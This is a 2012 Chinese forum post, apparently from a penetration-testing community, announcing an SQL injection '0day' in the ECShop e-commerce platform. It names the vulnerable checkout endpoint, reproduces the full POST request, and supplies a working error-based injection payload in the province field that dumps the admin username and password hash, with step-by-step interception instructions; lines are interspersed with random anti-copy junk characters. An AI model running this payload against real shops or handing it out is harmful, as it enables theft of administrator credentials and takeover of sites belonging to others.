中国网络渗透测试联盟

标题: ECShop全版本SQL注入0day [打印本页]

作者: admin    时间: 2012-12-31 09:19
标题: ECShop全版本SQL注入0day
感谢欠杀的黑盒
! e! \- ^6 W( n
: C8 E# u9 ?  h4 I8 G ; X: m4 I5 Y  o  Z/ ~, T
把任意商品加入购物车在填写配送地址那一页,有地区选择( O# R) i6 s% U
3 P% P; b0 i- Q4 \, l3 h4 W/ \: S) C& k
flow.php?step=consignee&direct_shopping=1( Z  a% c$ Q1 a, J8 m' `+ Q
比如省选择安徽, `8 ~4 ^: y. r9 N) O. O$ Z. H/ m% x6 l, ]

3 \0 K# [: D! Z* [5 P& z其中POST数据如下
# m, a' ]3 f( I& R3 ?. Z0 b , h5 L6 V3 i& K% G
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
8 W4 p$ o. Q, p; Y改成( u6 T" c% o. B5 M) h4 C

5 k0 n; E- C  s9 A$ Bprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #3 o! l6 {- n9 U+ q9 ~% I+ i
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..' f8 I+ {* k% S9 e( n
" C: V: K  J! j$ c
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
5 V6 }6 k& b  J3 ~! u$ \5 s+ V# e
! i- W% n# e; i% I就会回显错误页面了。。。。. L! l5 t7 u% @5 b* D
* v# s7 p/ g5 J# L. ~/ t' Q
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的! j. Z+ }) D4 k





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2